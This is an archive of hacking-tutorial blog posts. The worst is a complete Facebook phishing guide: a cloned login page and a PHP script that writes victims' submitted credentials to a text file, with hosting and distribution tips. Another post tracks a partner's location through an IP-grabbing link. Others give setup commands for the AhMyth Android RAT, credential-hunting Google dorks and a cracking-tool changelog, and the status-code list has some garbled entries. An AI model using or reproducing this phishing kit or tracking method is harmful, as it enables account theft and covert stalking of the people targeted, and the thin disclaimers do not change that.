All posts by Rushabh Gedam

Know anyone’s location by sending link through message(WhatsApp, Facebook, etc).

Where’s my boy/girlfriend ? Where he/she spend maximum time ? Do you think he/she lied to you ?

Well know about his/her location by sending just a link to them. How is it possible ? There are many services available which are providing such details, we are going to discuss one of the trusted credential provider which is Grabify. It is the worldwide based IP provider. Today we will use Grabify as your primary weapon and later on we will use  IP2LOCATION to get the exact location of our victim.

Steps to get locations :

  • Go to Grabify

You will see the page looks like



Rather than getting confused Enter any available existing live site URL which you want to show to your victims and then click on Create URL.


Also Read :-   Internet Response Codes with meaning.


Now it will create any temporary link which grabs the information of victims. If you are unable to understand jumo to its dashboard, it will automatically jump to the dashboard, no need to do anything.



The URL that has been pasted earlier. And this is the page on which our victim will be redirected.

  1. URL which we will send to our victims.
  2. In the other link you will have options to select other type of URL shortners.
  3. This is the Access token that is used for accessing the our account and regain the session
  4. This is very important link that used to access our session without creating an account on grabify.

Now deceive the intended user/victim to click on the link. Once he/she clicks on the link your important data will start generating. And resultant you can see the Date and time, IP address of the user, Country, service used by user to access the link, whether it was referred by Facebook/Whatsapp/Twitter, etc. As well as you can see the Host name and ISP service provider name.

I tried mine, and successfully got the better result.



Now what about location.

Get that IP address and paste it in IP2LOCATION



Paste that grabbed IP in this search box. Now its done.



This is what we wanted ever. Latitude and Longitude. Now use the Google maps. And get the exact location of the victim.

Note :- Gathering anyone’s information without their permission is illegal, don’t do this even if you are having qualities. I never did this to compromise anyone’s safety. If you want to know anyone’s location just call them and ask about their respective location. #TeamKnowledgeSuttra neither encourages you nor advice you to do such illegitimate things. This is just for knowledge purpose.

 

 

 

 

Internet Response Codes with meaning.

Started the web pentesting the thing which we missed out is response codes. Today you will get the whole and sole knowledge about the exact codes and what do they means. For example get through some cases.

  1. You fired up the browser and missed to connect the internet it will give you a page, which looks like this
  2. If you setup a proxy connection, but proxy refuses connection then it will prompt as

Ohk… Now you got an internet Connection which properly responds, But after also there are some cases we will discuss them.

  1. If you typed any wrong URL, or any wrong address for website it will return like
  2. If you are completely able to connect with the internet and after also something went wrong, this is not end user problem for technical issues. It may be server error, service provider error, or anything else. Then it will return page in which server, web domain and problem statement will be given. And luckily I would like to introduce that our site is well configured and not having such issues. Let’s get through the codes.
Sr. No.
Response Codes
Meaning
1.      100Continue
2.      101Switching Protocols
3.      102Processing
4.      103Checkpoint
5.      103Early Hints
6.      200OK
7.      201Created
8.      202Accepted
9.      203Non-Authoritative Information(Since HTTP/1.1)
10.   204No Content
11.   205Reset Content
12.   206Partial Content
13.   207Multi Status
14.   208Already Reported
15.   218This Is fine
16.   226IM used
17.   300Multiple Choices
18.   301Moved Permanently
19.   302Found(which is preciously removed)
20.   303See Other
21.   304Not modified
22.   305Use Proxy(Since HTTP/1.1)
23.   306Switch Proxy
24.   307Temporary Redirect
25.   308Permanent Redirect(Since HTTP/1.1)
26.   400Bad Request
27.   401Unauthorized Access
28.   402Payment Required
29.   403Forbidden
30.   404Not found
31.   405Method Not Allowed
32.   406Not Acceptable
33.   407Proxy Authentication required
34.   408Request Time Out
35.   409Conflict
36.   410Gone
37.   411Length Required
38.   412Precondition Failed
39.   413Payload Too Large
40.   414URI Too Long
41.   415Unsupported Media Type
42.   416Range Not Satisfiable
43.   417Expectation Failed
44.   418I’m a Teapot
45.   419Page Expired
46.   420Method Failure
47.   420Enhance your Calm
48.   421Misdirect Request
49.   422Unprocessable Entity
50.   423Locked
51.   424Failed Dependency
52.   426Upgrade Required
53.   428Precondition Required
54.   429Too Many Request
55.   431Request Header Field Too large
56.   450Blocked by windows  Parental Control
57.   451Unavailable for Legal Reason
58.   498Invalid Token
59.   499Token Required
60.   500Internal Server Error
61.   501Not Implemented
62.   502Bad Gateway
63.   503Service Unavailable
64.   504Gateway Timeout
65.   505HTTP version Not supported
66.   506Variant also negotiates
67.   507Insufficient Storage
68.   508Loop Detected
69.   509Bandwidth Limit Extended
70.   510Not Extended
71.   511Network Authentication Requirred
72.   520Unknown Error(Cloudfare)
73.   521Web Server is down(Cloudfare)
74.   522Connection Timed Out(Cloudfare)
75.   523Origin is unreachable(Cloudfare)
76.   524A timeout Occur(Cloudfare)
77.   525SSL handshake Failed(Cloudfare)
78.   526Invalid SSL Certificate(Cloudfare)
79.   527Railgun Error(Cloudfare)
80.   530Site is Frozen
81.   530Origin DNS Error(Cloudfare)
2.598Network Read Timeout Error

Once you have gone through this you might see that there is one sequence which is unique, i.e series of 1XX, 2XX, 3XX, 4XX, 5XX.

1xx (Informational):

The request was received, continuing process

2xx (Successful):

The request was successfully received, understood, and accepted

3xx (Redirection):

Further action needs to be taken in order to complete the request

4xx (Client Error):

The request contains bad syntax or cannot be fulfilled

5xx (Server Error):

The server failed to fulfill an apparently valid request

Identifying Gathered Data : Whois Records

In the previous blog we learned about some tools which allow us to gather some information about websites. As last blog is all about information gathering of any website, in this blog we will go through the exact understanding of data which is essential for hacking purpose. We will go through WHOIS records of website. But before that take permission of website owner.

Go to http://whois.domaintools.com/

It will look like as above image appears.

As I am concerned with my website I will show you some information regarding to my website.

Lets go through one by one entity.

Domain profile

In the domain profile you may see some most relevant information about the website and website domain name provider, as well as domain registrar info. Go through this. Let me aware you again without the owner’s permission don’t try anything malicious else it will punish you in jail.

Now If you go through the next listed tab which gives information about website

Response code 500 which means website is responsive, and alive also.

SEO score also best about 97%. And Seven hundred and fifty eight terms included.

And now its time for something unethical. If you generate the report and finds any bug, exploit it. But carefully we are very much attentive about that, if you finds anything convey us. And now search about your victims.

In the next lecture we will study about www.robtex.com

Information Gathering Online Tools

Hello everyone welcome to knowledgesuttra. Today we are going to discuss about the online tool which help for information gathering. There are various tools available online for information gathering for hacking. But some of them are most popular as compared to other. Let’s have a reminder that hacking is a crime unless and until you have permissions of owner. Scanning a website is also a crime, so do everything with the owners Permission.

Lets get to the tools.

Nmap :-

NMAP is a Kali Linux Based tool. But its web version also available. So there is no need of configuring Kali in your machine. If you haven’t heard about Kali Linux kindly go through.

Also read:- Top Mostly Used Pro Hacking Tools For Kali Linux

Back to nmap. Go to https://nmap.org.

Insert the IP address or domain name. And press Enter or click on search.

Zenmap is alternative for nmap whereas Zenmap is GUI based and nmap is command based. There is no other difference between both.

Now the other well known tool which gives more information about the victims website/domain.

Whois :-

As the name suggests this online portal which gives information about domain registry, for how much duration, and from which domain provider, and many more.

Go to http://whois.domaintools.com/

and enter your victims domain name/IP. And get maximum information about servers used, which OS is loaded on server, how many time it switched the location, etc.

A less popular but informative online tool known as Robtex.

Robtex :-

The tool is available online and have ability to determine even a network on the server. This tool is available on https://robtex.com.

This tool is used for data forensics. So before proceeding further kindly take the permissions of your victims.

Robtex uses various sources to gather public information about IP numbers, domain names, host names, Autonomous systems, routes etc. It then indexes the data in a big database and provide free access to the data.

All the tools mentioned above are the web based applications which doesn’t have any dependency. Hence these tools are useful.

RAT of Hackers : Remote Access Terminal(Trojan)

Hello everyone welcome to knowledgesuttra. Today’s topic is RAT of Hackers. We will see how to use RAT and how it works. RAT is the acronym for Remote Access Trojan(Terminal). It is used for accessing the others(victims) computer without having physical access to them. Yes there are many tools(Trojan) available for the same. Some of them are legal also, in which a hacker will ask their victims to allow access to victim. But those which are not legal allows hacker to directly control the victims PC. Some of the popular and well known RAT are teamviewer, putty, etc. At the windows user end it will prompted as Remote Desktop Protocol.

Let’s see some of the hacker’s RAT that might be usable and easy to understand.

Download and Configure the AhMyth

It is freeware and ready to build the applications. Applications able to install on the Android Mobile Phones. The download and configuration of AhMyth

git clone https://github.com/AhMyth/AhMyth-Android-RAT.git

Then open up it. And move to the directory

cd AhMyth-Android-RAT/AhMyth-Server

If you have Node JS build structure available then go to it by writing

npm start

Then write sudo npm start –unsafe-perm

Great It’s working. With the GUI(Graphical User Interface).

It allows to build standalone APK or an application that can harm other applications so that it will work as Trojan and backdoor also. Backdoor are set to do almost every task of the hackers.

Fight : HTTP vs HTTPS

Hi, welcome to KnowledgeSuttra . Here’s the another short fight between two standard browsing protocols. Having prior knowledge for Internet Browsing with or without security is necessary. For hacker’s How to get rid of SSL layer. Let’s take a deep dive.

Things that you must need to know during web surfing is that

  • Where your Internet Data is going ?
  • Site you are surfing is real or not ?
  • Do that site actually shares private data ?
  • And for hackers how to get rid of SSL layer ?

Let’s get through the soul.


Also Read:-  PRIVACY AGAIN GOING TO COMPROMISED BUT “DOOR TO PRIVACY IS HERE”


HTTP :-

HTTP is the acronym for Hyper Text Transfer Protocol. This protocol is basically used for the transfer of Web-pages from Web-server to Web-Browser.

HTTPS :-

HTTPS is the acronym for Hyper Text Transfer Protocol Secured. Security plays the best role over the Internet.

Completely know about the above mentioned terms.

Web-pages :-

Web-pages are basically HTML pages which may include JavaScript, Cascading Style Sheets(CSS), Angular JS, or any other coding language for designing purpose. This pages are stored at any machine well known as HOST machine. To access through internet the HOST must include the services of internet and this is the origin of name called server.

Web-server :-

Web-server is the machine where the Web-pages. While there’s need to access such pages on end users Device(Mobile/Laptop/Desktop/etc.) there’s need of browser.

Web-browser :-

To access the saved pages from server the end users device the utility used is known as Browser.

What HTTP exactly ?

HTTP sends end user queries through the internet but without encryption to the server.

What HTTPS exactly does ?

HTTPS sends end user queries through the Internet with an 128 bit Encryption at user end and same Decryption at the server end. In this way theMAN-IN-THE-MIDDLE-ATTACK possibilities are less.

How to get rid of SSL ?

The small toolkit/utility well known as SSLSTRIP available for Kali Linux

Coming soon with Guide on SSLSTRIP.

Facebook phishing: Complete Guide

Hello everyone welcome to knowledgesuttra. today we are discussing about Facebook phishing. Steps required for making a facebook phishing page. Before proceeding it is respectively mentioned that don’t be malicious.

Create Facebook phishing page

Open facebook.com in your browser.
Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view the code behind this page.
Go ahead and Copy all of the page’s source code into Notepad (or your operating system’s best simple text editor).
If using Notepad, hit ctrl F (which is the find hotkey) and search for action.
You should see a line that looks like this: action=”https://www.facebook.com/login.php?login_attempt=1
Delete everything contained in the quotations, and instead fill the quotes with post.php.
Now it should read action=”post.php”Save this file somewhere on your computer with the file name of index.htm.
Omit the final period from the filename. This is going to become your phishing page.
Next, create a new notepad document with the name of post.php.
Omit the final period from the filename.

Copy and paste the following code into this document, and remember to save it:

<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

At this point, you should now have two files saved: index.htm and post.php.Next, this code actually needs to be uploaded to a web hosting service.
There are free hosting providers.
We’ll be using 000Webhost.After you have signed up for an account, browse to the control panel, and then to file manager.
Once the window opens, go to public_html.
Delete default.php, and then upload index.htm and post.php.
Next, click on a preview of index.htm. As you’ll notice, it should look nearly identical to the Facebook login page.
The URL of this page is what needs to be linked to in an attack. Sometimes attackers imbed this false link on other websites, forums, popup ads, and even emails.
Now go back to the file manage-rand public_html. There should be a file labeled username.txt.Open this file and you should be able to see login credentials that have been entered by a test user.

Don’t be malicious. Be conscious. And hereby we are not responsible for any kind of hacking attempt. Do this at your own risk.

STORM v2.5.1 has been released

Hello everyone welcome to knowledgesuttra. Today we are discussing about The STORM, what is STORM and what is new in this v2.5.1 of STROM.

What is STORM?

STORM is cracking program designed to perform website security testing.

What’s new

-Added FTP Support once again, But this time more light-weight and optimized!

– Added ‘Tested Per Minute’, ‘Total Threads’ and ‘Total Loaded Combo’ Stats.

– Added “HMACSHA1”, “HMACSHA384”, “HMACSHA512”, “HMACMD5” and “HMACRIPEMD160” support for PBKDF2 Hashing. (The Function name also has been changed from “pbkdf2hmacsha256” to “pbkdf2hmac”)

– Added ‘GetBytes’, ‘GetString’, ‘AES’, ‘RSAParameters’ and ‘RSA’ Functions.

– Added ‘Base64’ option for ‘SHA’ and ‘HMAC’ Hashing methods.

– ‘Base64Encode’ And ‘Base64Decode’ Functions now Supports Byte Arrays Inputs!

– Fixed a very rare “It’s time to wait for data from the HTTP server” message on some special pages!

– Fixed the Proxy Authorization was being ignored.

– Fixed an OLD Bug behind the FTP Stages!

– Fixed the worker list position cannot go higher than 4,000,000 and stops at 4 Million list position.

– Fixed a very rare Redirect Location issue (Like the Origin’s SelfLocation header Redirect Infinite Loop)!

– Fixed the Debug Window keeps sending requests in redirect loops even while you have the window closed!

– Fixed the “Cookie: *” functionality.

– Removed the Junk MessageBox on “Delete” button in Debug Form. Version 2.5.1

– Added “HEX” and “Bytes” Support for “RSA” and “AES” functions output type.

– Fixed Double “Cookie: ” was being sent while you had the cookies in Headers Variable.

– Fixed the “URLEncode”/”URLDecode” function not encoding/decoding some special chars.

This information is given for the educational purpose. Use this information with your own risk.

Google’s Syntax(Dorks) : A better way to browse

Google is working with its own Syntax’s to search during the browsing session. Google has many data as much as we wanted. So grab it by putting the exact queries and get the data what you exactly wanted.
The Google Web index discovers reply to our inquiries, which is useful in our day by day lives. You can look for your school assignments, reports, introductions and that’s only the tip of the iceberg.
At the end of the day, we can utilize Google dorks to discover vulnerabilities, shrouded data and access pages on specific sites. Since Google has a looking calculation and files most sites, it very well may be valuable to a programmer to discover vulnerabilities on the objective.

Also Read:-
  1. Download what exactly you wanted : Underground Browser
  2. Android Configuration in Virtual Machine

The essential linguistic structure for cutting edge administrators in Google is:

operator_name:keyword

For instance, this operator_name:keyword punctuation can be composed as ‘filetype:xls intext:username’ in the standard inquiry box, which results in a rundown of Exceed expectations records which we contain the term ‘Username‘.

Basic Google Numskulls Punctuation

webpage :–

will return site on following space

Allintitle and intitle –

contains title determined expression on the page

inurl –

limits the outcomes contained in the URLS of the predetermined expression

filetype –

look for determined filetype designs

What Information Would we be able to Discover Utilizing Google Goof balls?

  • Administrator login pages
  • Username and passwords
  • Defenseless substances
  • Delicate archives
  • Govt/military information
  • Email records
  • Financial balance subtle elements and parts more

Google Goof balls can likewise be utilized for arrange mapping; we’re ready to discover the subdomain of the objective site utilizing Basic Dorks.

Download what exactly you wanted : Underground Browser

Hi,welcome to KnowledgeSuttra .Maximum time the user wants to download Softwares/ Files(resumes, documents, Excel sheets, etc)/Games, Videos, etc. But surfing on the web with Traditional HTTP(Hyper Text Transfer Protocol) is not appearing the satisfactory results. Then there is need of changing the traditional way to Advanced way.
Lets have a small introduction towards the protocols existing in the Web.

  • HTTP/S :- Hyper Text Transfer Protocol/Secured
  • FTP:- File Transfer Protocol
  • SMTP :- Simple Mail Transfer Protocol
  • TCP/IP :- Transfer Control Protocol
  • UDP :- User Datagram Protocol

These are some of the most important protocols which we face daily.
HTTPS used for HTML/Web pages transferring from host to destination. And whenever we tries to download anything from web there’s transfer of data which is large in size, almost every host uses the FTP protocol.
Lets get to the guide.
Go to browser -> enter the address gegereka.com

The above screen appears before you. Before proceeding introducing you a very sophisticated way to browse. Check the given image to find category of which you want to download. Don’t waste time in doing so. Directly jump to the next phase. In which interface will look like Google.


Enter your query. Then click on the Enter.
Great News ! We got the exact application which we want to download. But if you can notice the software’s links are not working because there’s a small lock present which must be unlocked, then and only after then you are able to download.

How to unlock ?

Click on lock or here given in link.

Oooooooooooooopppsss…!!!!!!!
It asked for the unlock code.
Now next step.
Click on Get the code >>> Button shown below in the gegereka page.

Now you may confused about giving the actual data should be problematic. So provide fake details. Which are not existing. As shown in figure.

But note :- Mail box must include @ and .com as well as correct captcha.

Good news, we got access. Click on Access Granted >>.
Click on any of the software’s link, also there’s option to directly establish connection with host machine’s database, via FTP protocol.

This is arrives when clicked on connect to database, and if we click on the file. The download will automatically started.

Here Is Quick Video tutorial, Take a look.